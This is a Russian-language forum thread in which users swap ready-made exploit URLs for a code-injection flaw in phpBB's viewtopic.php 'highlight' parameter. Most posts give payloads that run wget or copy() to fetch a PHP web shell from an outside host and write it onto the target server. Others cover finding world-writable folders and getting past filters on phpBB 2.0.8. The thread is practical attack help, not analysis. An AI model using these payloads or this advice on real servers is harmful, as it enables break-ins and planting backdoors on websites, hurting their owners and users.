можно закачать shell этой командой:
viewtopic.php?p=1&highlight=%2527.$poster=%60$ls%6 0.%2527&ls=wget%20http://badsite/shell.php

или:
viewtopic.php?p=3906&highlight=%2527.$poster=`wget %09http://badsite/shell.php`.%2527

может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =)

Onyx3, а почему ...t=44=... это бред! в твоём случае надо писать без t= !

а у меня вообще пишет что такой темы нет

Люди, ведь форум находится в : http://имяхоста/modules.php?name=Forums

И не одна из этих комманд чтобы залить шелл не действует!!!
Пишет либо - модуль не активен, либо ошибку Денвера!!!


Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

поробуй выполнить команды так:

а возможно ли записать открытую на запись, которая находиться на сервере не в папке "форум"

и еще, ну узнал, я какая папка доступна на запись (даже в папке форум), что в запрос надо написать ?

viewtopic.php?a=http://123.123.123.123/remview.php&b=../../db/rem.php&t=4&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527 ???????

типо этого? b=../../db/
а что вместо точек писать? полный путь? где находиться папка?
в таком случае как именно?
что брать за корневой католог?
forum/db/
или полный путь
/usr/home/public_html/forum


не понятно всё это...

P.S.
ведь drwxrwxrwx - это открытая папка на запись.

да не геморься ты, лучше залей обычным wget'ом и потом скопируй...

мне в ответ пишет:

The html tags you attempted to use are not allowed

[ Go Back ]

Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

Эй ну что кто нибудь встречал такую проблему??